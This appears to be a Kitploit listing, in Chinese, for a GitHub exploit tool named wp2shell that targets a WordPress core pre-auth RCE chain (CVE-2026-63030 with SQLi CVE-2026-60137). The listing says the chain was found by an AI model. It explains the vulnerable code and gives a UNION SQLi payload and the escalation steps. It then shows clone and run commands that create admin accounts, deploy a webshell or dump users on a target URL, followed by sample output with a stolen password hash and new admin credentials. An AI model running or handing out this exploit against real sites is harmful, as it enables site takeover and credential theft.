Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-63030 — WordPress 核心未认证 RCE:通过 REST 批量路由混淆 + SQLi (CVE-2026-63030 + CVE-2026-60137) | Kitploit
工具/GitHubGitHub/shinthink/cve-2026-63030
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育Payload 开发
GitHubshinthink/cve-2026-63030

CVE-2026-63030

WordPress 核心未认证 RCE:通过 REST 批量路由混淆 + SQLi (CVE-2026-63030 + CVE-2026-60137)

查看仓库
122个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-63030 + CVE-2026-60137 — WP2Shell

WordPress 核心预认证 RCE:REST 批处理路由混淆 + SQLi


概述

CVE-2026-63030(CVSS 9.8)和 CVE-2026-60137(CVSS 9.1)在 WordPress Core 中构成一条严重的 预认证远程代码执行 利用链。该漏洞影响所有默认 WordPress 安装版本 6.9.0–6.9.4 和 7.0.0–7.0.1。

该利用链 由 GPT-5.6 Sol Ultra 自主发现(OpenAI),耗时仅 10 小时出头,成本约 25 美元——此类漏洞在漏洞交易市场上的估值高达 500,000 美元。

未认证攻击者可通过以下方式实现 RCE:

  1. REST 批处理路由混淆(CVE-2026-63030)——使 WordPress 内部处理器与请求数组失去同步
  2. 通过 author__not_in 的 SQL 注入(CVE-2026-60137)——利用标量字符串绕过 absint() 过滤
  3. UNION SELECT 缓存投毒——在内存中伪造 7 个 WP_Post 对象
  4. oEmbed 持久化——将只读 SQLi 转换为真实的数据库写入
  5. customize_changeset 劫持——临时借用管理员身份
  6. parse_request 钩子重入——以提升的权限重放 REST API
  7. 以管理员身份 POST /wp/v2/users——创建新的管理员账户

活跃安装量: 4.72 亿+(占所有网站 43%)
发现者: GPT-5.6 Sol Ultra(经 Adam Kues / Searchlight Cyber),2026 年 7 月
利用链 PoC: Mustafa Can İPEKÇİ (nukedx)
补丁: WordPress 6.9.5 / 7.0.2 / 6.8.6(2026 年 7 月 17 日)

受影响版本

分支受影响版本已修复版本
6.9.x6.9.0 – 6.9.46.9.5
7.0.x7.0.0 – 7.0.17.0.2
6.8.x仅 SQLi(CVE-2026-60137)6.8.6

漏洞机制

根因 1:批处理路由混淆(CVE-2026-63030)

WordPress 的 REST 批处理处理器(serve_batch_request_v1)维护两个数组:$validation[](校验结果)和 $matches[](路由处理器)。当 wp_parse_url() 在畸形路径(///)上失败时,一个 WP_Error 会被推入校验链,但不会进入路由匹配链:

// class-wp-rest-server.php
$parsed_url = wp_parse_url( $args['path'] );
if ( false === $parsed_url ) {
    $requests[] = new WP_Error( 'parse_path_failed', ... );
    continue;  // ← SKIPS $matches[] — desync by one index
}

该利用通过嵌套(递归)批处理调用,同时绕过方法限制和参数过滤。

根因 2:通过 author__not_in 的 SQL 注入(CVE-2026-60137)

WP_Query 仅在 is_array() 分支内部应用 absint() 过滤。当 author__not_in 以标量字符串形式传入时,过滤会被完全跳过:

// class-wp-query.php
if ( ! empty( $query_vars['author__not_in'] ) ) {
    if ( is_array( $query_vars['author__not_in'] ) ) {
        $query_vars['author__not_in'] = array_unique( array_map( 'absint', ... ) );  // ONLY if array
    }
    $author__not_in = implode( ',', (array) $query_vars['author__not_in'] );  // scalar passes raw
    $where .= " AND {$wpdb->posts}.post_author NOT IN ($author__not_in) ";     // SQL INJECTION
}

Payload:0) UNION ALL SELECT ...-- - 闭合 NOT IN 列表并追加任意 SQL。

利用链升级

[1] Batch desync → bypass auth + param checks
[2] UNION SELECT → forge 7 fake WP_Post objects in cache
    ├─ Trigger post    — [embed] shortcode
    ├─ Changeset post  — post_type=customize_changeset, post_status=future
    ├─ Outer partner   — post_parent=changeset (Loop 1)
    ├─ oEmbed target   — cache backing
    ├─ Nav menu item   — post_type=nav_menu_item
    ├─ Request post    — post_type=request, post_status=parse (Loop 2)
    └─ Inner partner   — post_parent=request
[3] oEmbed processing → wp_update_post() → hierarchy cycle detection
[4] Loop 1 fix → writes changeset to DB without overwriting post_content
[5] _wp_customize_publish_changeset() → wp_set_current_user(admin_id)
[6] Loop 2 fix → writes request post → do_action("parse_request")
[7] rest_api_loaded() → serve_request() → batch replayed as ADMIN
[8] POST /wp/v2/users → administrator created

完整 RCE 的前提条件

要求原因默认满足?
至少 1 篇已发布文章为 oEmbed 缓存提供回环 URL✅ “Hello World”
无持久化对象缓存UNION 行不得被 split_the_query 丢弃✅ 文件缓存
REST API 可访问通过 parse_request 重新进入需要 REST 服务器✅
可直接写入文件系统插件上传需要 FS_METHOD=direct✅ 大多数主机

安装

git clone https://github.com/shinthink/CVE-2026-63030.git
cd CVE-2026-63030
pip3 install -r requirements.txt  # or: nothing — stdlib only

使用

# Full chain — create admin account (pre-auth)
python3 cve_2026_63030.py --url https://target.com

# Check only (non-destructive — verify vulnerability)
python3 cve_2026_63030.py --url https://target.com --check

# Full chain + deploy RCE webshell
python3 cve_2026_63030.py --url https://target.com --rce id

# Dump all users via UNION extraction
python3 cve_2026_63030.py --url https://target.com --dump-users

输出

+======================================================================+
|         wp2shell -- Pre-Auth RCE PoC (Educational / Research)        |
|   CVE-2026-60137 (SQLi)  +  CVE-2026-63030 (Batch Route Confusion)  |
+======================================================================+
  Target :  https://target.com
  Mode   :  FULL CHAIN

[STEP 1] Verifying batch endpoint + route-confusion desync
  [+] Batch endpoint reachable (HTTP 207)
  [+] Desync confirmed (markers: parse_path_failed, rest_batch_not_allowed)

[STEP 2] UNION SQLi — database reconnaissance
  [+] Database version  : 8.0.46
  [+] Database user     : wp_user@localhost
  [+] Database name     : wordpress_db
  [+] Table prefix      : wp_
  [+] Admin login       : admin
  [+] Admin hash        : $P$B5xK3mwBxY2dOe/MKWx5VXGihwSUO
  [+] Admin user ID     : 1

[STEP 3] Creating a fresh administrator via oEmbed post-cache poisoning
  [*] Seeding oEmbed cache with 3 loopback URLs...
  [+] oEmbed cache IDs: [6, 7, 8]
  [*] Submitting changeset poison + user creation...
  [+] Admin created -- username: wp2_a1b2c3d4  password: Wp2!e5f6g7h8i9j0

+======================================================================+
|  EXPLOITATION COMPLETE                                               |
+======================================================================+
  Admin : wp2_a1b2c3d4 / Wp2!e5f6g7h8i9j0
  Login : https://target.com/wp-login.php

文件

文件用途
cve_2026_63030.py单目标利用脚本(零依赖)
requirements.txtPython 依赖(无需任何依赖)

参考链接

  • SLCyber — GPT-5.6 Sol 发现分析
  • WordPress.org — 安全更新
  • Wiz — 在野利用
  • Tenable — 常见问题

免责声明

仅限授权安全测试和教育研究使用。作者不对滥用行为承担任何责任。

下载工具